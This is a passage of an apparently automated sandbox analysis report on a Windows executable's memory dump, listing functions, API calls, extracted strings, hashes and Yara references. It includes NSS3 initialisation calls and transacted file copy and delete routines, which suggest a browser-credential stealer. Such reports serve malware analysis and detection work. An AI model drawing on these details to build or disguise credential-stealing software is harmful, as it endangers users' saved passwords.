Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 0043A710
std::_Lockit::~_Lockit.LIBCPMT ref: 0043A726
Concurrency::cancel_current_task.LIBCPMT ref: 0043A73B

Strings

.t, xrefs: 0043A6CD, 0043A71D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID: .t
API String ID: 2251497708-2606965755
Opcode ID: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
Instruction ID: 5ba2fc5c3ae075925c79352b4985af9af2bb908a4d5ddd33a0a84bd499be29b8
Opcode Fuzzy Hash: 42856f84c8fe50d840c97780866a0629ca990773a1ce0ca6709d26a5b7a7207f
Instruction Fuzzy Hash: 2B11E132D101259BCB14EBA5D855ABF7774EF88728F10052FF851A7282DB789D01CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 004280D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004280DB

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004280EB, 004280FB, 004281AD, 004281EE, 00428230
not keep_stack.empty(), xrefs: 004280FC
object_element, xrefs: 00428235
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004281AE
not key_keep_stack.empty(), xrefs: 004281EF

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction ID: 02a3948f5721aa9a7a5a529718c8f0f58267128f42a49cbeb15ad061ff2bd8ad
Opcode Fuzzy Hash: 4a495dc74c46c9530ee6837ae531c37f4910c6bfef5c9e9643f61759229618e9
Instruction Fuzzy Hash: 24510430B01114DFDB04DF65D486BAE7BA5FF45314F84809EE8055B282DB78AC55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00428285, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042828A

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0042829A, 004282AA, 0042835C, 0042839D, 004283DF
not keep_stack.empty(), xrefs: 004282AB
object_element, xrefs: 004283E4
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 0042835D
not key_keep_stack.empty(), xrefs: 0042839E

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
Instruction ID: d86e02c9f3b8653c4ca74c29ae50a8666d7dd5994750ee7d096b894a5484e904
Opcode Fuzzy Hash: 9d4cb45d419ee4620783c0c0cd48349c2460d4bc81323b67cbb79ecffd1d615a
Instruction Fuzzy Hash: 5951F430B001249FCB04EF65D486BAE7BB5FF45314F84809EE8059B292DB79AD54CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428434, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00428439

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00428449, 00428459, 0042850B, 0042854C, 0042858E
not keep_stack.empty(), xrefs: 0042845A
object_element, xrefs: 00428593
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 0042850C
not key_keep_stack.empty(), xrefs: 0042854D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
Instruction ID: ef96e7c7adb5d8b8a577f56dd21b84160054c2bc9393711002ca6b1764e60304
Opcode Fuzzy Hash: d028862a6715dafbaf1e244a621cfc67416bdaee1d47a3ad37c64fb3358355c1
Instruction Fuzzy Hash: 6251F430B00114AFDB04EF65D486BAE7BA4FF45314F84809EE8059B396DB78ED54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004285E3, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004285E8

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004285F8, 00428608, 004286B8, 004286F9, 0042873B
not keep_stack.empty(), xrefs: 00428609
object_element, xrefs: 00428740
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 004286B9
not key_keep_stack.empty(), xrefs: 004286FA

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
Instruction ID: ab07ae53d137fbd5d81d814e9ed1350d295043a2f7c009784a1c927ca44db523
Opcode Fuzzy Hash: d3354caba45fd1f1cea50c77a2bf27c00e0c25e015989f75e25a93662e20699f
Instruction Fuzzy Hash: 8651E531B002109FCB04EF65D886BAE7BB5BF45314F94809EE8059B292DB78AD54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00458774, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 004587DF
api-ms-, xrefs: 004587CB

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
Instruction ID: 0fd8a11ffa56757e8ccf918c2529828d077cd395863ae7d7221dbacfabbe6c1d
Opcode Fuzzy Hash: 37c81110ed85044dd5aceeaecdd1ea098defe0701216d777ea815dd99649c165
Instruction Fuzzy Hash: 8821F672E01211BBCB21AB659C40A1B3658EF05765F25112BED46B7392EE38DC05C5ED

Uniqueness

Uniqueness Score: -1.00%

Function 0044EFF0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,A:\_Work\rc-build-v1-exe\json.hpp,00000000,00000001), ref: 0044F010
GetFileType.KERNEL32(00000000), ref: 0044F022
swprintf.LIBCMT ref: 0044F043
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0044F080

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 0044F00A
Assertion failed: %Ts, file %Ts, line %d, xrefs: 0044F038

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: A:\_Work\rc-build-v1-exe\json.hpp$Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-3717751166
Opcode ID: a2900e388ed8d9a29e413601cc924012d21cb5f186ec7327ffff8d17a127d43c
Instruction ID: 0bb24b927ce2443003cb3248a7e15c158f8fd1a0fdd703ce72ccd99075f467c8
Opcode Fuzzy Hash: a2900e388ed8d9a29e413601cc924012d21cb5f186ec7327ffff8d17a127d43c
Instruction Fuzzy Hash: FA112B71900118ABDB209F25CC44DEF73ACEF89314F50456AFA1693182EA34AD498B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB86, Relevance: 9.2, APIs: 6, Instructions: 236fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042AB8B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 0042AC96
CloseHandle.KERNEL32(00000000), ref: 0042ACA5
GetFileSize.KERNEL32(00000000,00000000), ref: 0042ACEC
ReadFile.KERNEL32(00000010,00000000,00000000,?,00000000), ref: 0042AD17
CloseHandle.KERNEL32(00000010), ref: 0042AD1E

Part of subcall function 0040B7A7: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00488780,00000000,00000000,?,004209C9,00000000), ref: 0040B7BA
Part of subcall function 0040B7A7: DeleteFileTransactedA.KERNEL32 ref: 0040B7D1
Part of subcall function 0040B7A7: CommitTransaction.KTMW32(00000000,?,004209C9,00000000), ref: 0040B7DC

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
String ID:
API String ID: 604483397-0
Opcode ID: 65484480058809af0bbef7375cf9a7d4b190e78b0393de308447d967469a11d0
Instruction ID: 1e0958ef53f511d795c374f297b53ba487068b5b819034deb9897256c487750a
Opcode Fuzzy Hash: 65484480058809af0bbef7375cf9a7d4b190e78b0393de308447d967469a11d0
Instruction Fuzzy Hash: 7191F130D002589FCF15EFE5D9806EEFBB5AF16304F50809EE445B7252EB780A49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0041819E, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 421COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004181A3

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32 ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

$-<;, xrefs: 0041825C
+*/", xrefs: 004182BA
:+, xrefs: 004181CE
kf, xrefs: 00418416

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: $-<;$+*/"$:+$kf
API String ID: 1138659288-2765919554
Opcode ID: e4d59c08add6ae5f6f2776abce751e52af22e04866c40a4b8c5b9487a9eb5303
Instruction ID: bbc5fa7d8495b31bda5dc89a895256d9648518a168c8a285f567c0596adcd820
Opcode Fuzzy Hash: e4d59c08add6ae5f6f2776abce751e52af22e04866c40a4b8c5b9487a9eb5303
Instruction Fuzzy Hash: 1C028D70D00259CADF15DFA5C990BEDFBB1AF19304F1081AEE419B7282DB781A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF7A, Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 363COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AF7F

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32 ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Strings

kbst, xrefs: 0041B02A
`se`, xrefs: 0041B088
id, xrefs: 0041B1C1
], xrefs: 0041B091

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: ]$`se`$id$kbst
API String ID: 1138659288-646620230
Opcode ID: fc7db0666092f497b471047a5a6ccd22828727454245da2200092a7d530e0500
Instruction ID: cd823db35d4b2da1e85ed8d2677e4f0b62ee586edfcd5bb7b5e523aefa769edf
Opcode Fuzzy Hash: fc7db0666092f497b471047a5a6ccd22828727454245da2200092a7d530e0500
Instruction Fuzzy Hash: 27F19E70D00289DBCF15DFA5C991AEDFBB1AF18304F1481AEE415B7282DB781A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043A5E6, Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A5EB
std::_Lockit::_Lockit.LIBCPMT ref: 0043A5F9
int.LIBCPMT ref: 0043A610

Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E

std::_Facet_Register.LIBCPMT ref: 0043A64A
std::_Lockit::~_Lockit.LIBCPMT ref: 0043A660
Concurrency::cancel_current_task.LIBCPMT ref: 0043A675

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
String ID:
API String ID: 2251497708-0
Opcode ID: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
Instruction ID: 1b671ef6c59355c3337e8e153c21f328b4ee3e00f52423c5d6ae957731a9b330
Opcode Fuzzy Hash: 8da28d98de807ecf371120a3688b963d75b1e9e2796adba88c70522f423f566b
Instruction Fuzzy Hash: 6E112172D10115EBCB04EBA5C806ABF7764EF58728F10062FF851A7282DB789D00CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00422CE6, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 262COMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1

Strings

#9, xrefs: 00422B57
G, xrefs: 00422A40
WKIW, xrefs: 00422A28
7, xrefs: 00422B17

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Deallocate$InitShutdown
String ID: #9$7$G$WKIW
API String ID: 2192743348-1397076925
Opcode ID: aa52d31e0a3caaa6733ae31e22ecbb41f01720955fd062755e5fb1b28e8eb82a
Instruction ID: 3f356ab3f001ca719e9731ff8965c6f3fd2e2bb1c5e3e1a71f8955075b4204b4
Opcode Fuzzy Hash: aa52d31e0a3caaa6733ae31e22ecbb41f01720955fd062755e5fb1b28e8eb82a
Instruction Fuzzy Hash: E0C18B30D04298CAEF15DBA4D951BEDBBB0AF69304F5441EED44837292EB741B89CF29

Uniqueness

Uniqueness Score: -1.00%

Function 00426B76, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00426B7B

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426B87, 00426B97, 00426BCC, 00426BF0
m_it.array_iterator != m_object->m_value.array->end(), xrefs: 00426BCD
m_it.object_iterator != m_object->m_value.object->end(), xrefs: 00426BF1
m_object != nullptr, xrefs: 00426B98

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$m_it.array_iterator != m_object->m_value.array->end()$m_it.object_iterator != m_object->m_value.object->end()$m_object != nullptr
API String ID: 3519838083-3557933457
Opcode ID: 2633f46ee30e1dce7af4086a71d492daed2116d8cb284fdc922538196d3d70e4
Instruction ID: 5dac4553eb58cb67bf1ddaa7ba34fed1eb637e16824751684e4034dbfe2a5be6
Opcode Fuzzy Hash: 2633f46ee30e1dce7af4086a71d492daed2116d8cb284fdc922538196d3d70e4
Instruction Fuzzy Hash: 7421F0307002109BC714EB5AD892EAAB7B4EF81718F55806FE486A7682D7ADAD44CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00444732, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,004447F3,00000000,00000FA0,0048BA44,00000000,?,0044491E,00000004,InitializeCriticalSectionEx,0046F52C,InitializeCriticalSectionEx,00000000), ref: 004447C2

Strings

api-ms-, xrefs: 00444782

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
Instruction ID: 3b02404eba06537680092bea4a821423ad8daff009a81e922f8f1e142575d85b
Opcode Fuzzy Hash: 467092fd28b44278f2e42a73788f31ccf4b46487d1dd9a34cceeb5f7ec7b4dc6
Instruction Fuzzy Hash: B211CA76E41521ABFF224B689C45B5A73949F82764F154132E910FB3C0E7B8ED0286DE

Uniqueness

Uniqueness Score: -1.00%

Function 00446C43, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00446C38,00457287,?,00446C00,00000000,?,00457287), ref: 00446C58
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00446C6B
FreeLibrary.KERNEL32(00000000,?,?,00446C38,00457287,?,00446C00,00000000,?,00457287), ref: 00446C8E

Strings

CorExitProcess, xrefs: 00446C63
mscoree.dll, xrefs: 00446C51

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6f747d6073583924e2a306123961ecc6cb666b318c6259bed0b47b83b6364465
Instruction ID: ee7b99c57350bf79ecb4fac4ea45e1210067ee34872e4bcd7f7263def1a7a890
Opcode Fuzzy Hash: 6f747d6073583924e2a306123961ecc6cb666b318c6259bed0b47b83b6364465
Instruction Fuzzy Hash: B3F08230E00218FBEB119F50DD09B9E7A78EF01756F140171F445A1260EBB88E04DA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045CA1C, Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0045CAA0
__alloca_probe_16.LIBCMT ref: 0045CB66
__freea.LIBCMT ref: 0045CBD2

Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0

__freea.LIBCMT ref: 0045CBDB
__freea.LIBCMT ref: 0045CBFE

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 29d96c277da711d6662cec2048b7306678155e3323c72a93c3a6e14aeced3682
Instruction ID: 448ccdf4ceac666b46c4a2e8f445c3caf8736f67bbcb2bc619faa3b7f9344070
Opcode Fuzzy Hash: 29d96c277da711d6662cec2048b7306678155e3323c72a93c3a6e14aeced3682
Instruction Fuzzy Hash: 1A51D67250031AAFEB209E559C82FAB3BAADB44756F15011BFD04A7242D63DEC198698

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA19, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041AA1E

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32 ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Strings

!}lXlNODSN, xrefs: 0041AA5E
,!, xrefs: 0041AC67
'{j^jHIBUH{, xrefs: 0041AB47

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: !}lXlNODSN$'{j^jHIBUH{$,!
API String ID: 1138659288-4150241439
Opcode ID: 95c618ea2f5267224a6feffe79fbc1a9830ab3d9a7f195a988be9a2338a506fb
Instruction ID: 4f1090c892d8ae7c3e0211310b65ef22603f6978cd539da6ace53d37eb25d9bb
Opcode Fuzzy Hash: 95c618ea2f5267224a6feffe79fbc1a9830ab3d9a7f195a988be9a2338a506fb
Instruction Fuzzy Hash: 88F19D70D01289CBCF15DFA5C990AEDFBB1AF18304F1081AEE415B7282DB785A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4CA, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 363COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A4CF

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
Part of subcall function 00415505: CopyFileTransactedA.KERNEL32 ref: 00415541
Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C

Strings

4hU@[Y]W, xrefs: 0041A509
nc, xrefs: 0041A711
>, xrefs: 0041A5E1

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
String ID: 4hU@[Y]W$>$nc
API String ID: 1138659288-2892674260
Opcode ID: dc4de6d849db6bd019c7946f23a37aea6e8c2aa1ce32c48513c5a5865d10b4f4
Instruction ID: 69b4d2af1efff5d51a6b8d1072d60d64673e41b76a7434ce0b1ca36e894e148f
Opcode Fuzzy Hash: dc4de6d849db6bd019c7946f23a37aea6e8c2aa1ce32c48513c5a5865d10b4f4
Instruction Fuzzy Hash: BAF1AE70D01289DBCF15DFA5C590AEDFBB1AF18304F2481AEE415B7282DB385A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041A10D, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041A112

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Strings

dm|{, xrefs: 0041A224
p, xrefs: 0041A234
TBip, xrefs: 0041A22D

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: TBip$dm|{$p
API String ID: 3708980276-1957332360
Opcode ID: 94a81dde7459f1e84800fb0f29704624a2ca8126c9b3541b2b22fc7ccf91a9fb
Instruction ID: 8adcde93a9ef1de87be0b0092f894219ddf417b26770064712094cc799b8c3e8
Opcode Fuzzy Hash: 94a81dde7459f1e84800fb0f29704624a2ca8126c9b3541b2b22fc7ccf91a9fb
Instruction Fuzzy Hash: 3351BF70D05248CBCF01EFEAD5915EEFBB0AF59304F64852EE0157B282DB781A4ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAD5, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041CADA

Part of subcall function 0041CC08: __EH_prolog.LIBCMT ref: 0041CC0D

Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0041C9B7: std::exception::exception.LIBCONCRT ref: 0041C9D8

Strings

6rkw, xrefs: 0041CB6B, 0041CB96
parse_error, xrefs: 0041CB0A
parse error, xrefs: 0041CB41

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$Deallocatestd::exception::exception
String ID: 6rkw$parse error$parse_error
API String ID: 3877490255-3452702896
Opcode ID: e5f63f01cc0f67bc6343e762b63629f9969f0024241a3fb85f46e634e8c155b9
Instruction ID: 619f871298406fe59a0c694d79639b1860845e3fadba83f61e984e9bf45d46c9
Opcode Fuzzy Hash: e5f63f01cc0f67bc6343e762b63629f9969f0024241a3fb85f46e634e8c155b9
Instruction Fuzzy Hash: 9F314F70D00248DFCB05EFA5C991ADDBBB4EF15304F5080AFE405A3292DB785A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004243FC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00424408

Part of subcall function 0040903F: ___std_exception_copy.LIBVCRUNTIME ref: 0040905D

std::exception::exception.LIBCMT ref: 00424420

Strings

P>B, xrefs: 00424400
P>B, xrefs: 00424402, 00424407

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$___std_exception_copy
String ID: P>B$P>B
API String ID: 3231571295-939619877
Opcode ID: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
Instruction ID: ce35b15519815ffbb67f81b71231185bf0eb88c8a934b23e7a6a4c5c11c1483f
Opcode Fuzzy Hash: 4e93054eadd2fe5ede0c78d7ef0f7e29d9dca12dad372d62d1676b1f409477ce
Instruction Fuzzy Hash: B6E04F726003046BD704EF56D8C08A7B7ACFB95364300C12BFD048B302D7B4E8158BE5

Uniqueness

Uniqueness Score: -1.00%

Function 0046686E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0046693E
_free.LIBCMT ref: 00466967
SetEndOfFile.KERNEL32(00000000,0046413C,00000000,0045A93D,?,?,?,?,?,?,?,0046413C,0045A93D,00000000), ref: 00466999
GetLastError.KERNEL32(?,?,?,?,?,?,?,0046413C,0045A93D,00000000,?,?,?,?,00000000), ref: 004669B5

Memory Dump Source

Source File: 00000000.00000002.673727656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 2aa08d2edf2c4ee48e59ede22ce0a1a10d6d81f2907a493e3665ac833eea6798
Instruction ID: 797d3279cc2cce8438377f55fbe9cb65b9558afef913def79cecf0957a5e1668
Opcode Fuzzy Hash: 2aa08d2edf2c4ee48e59ede22ce0a1a10d6d81f2907a493e3665ac833eea6798
Instruction Fuzzy Hash: 234185F29006059BDB11ABBA8C46B9E3775EF44324F16051BFD14A7392FB3CC848866A

Uniqueness

Uniqueness Score: -1.00%

Function 0043ED7A, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000000,?,?,?,0041379B,?,?,?,00000000), ref: 0043ED97
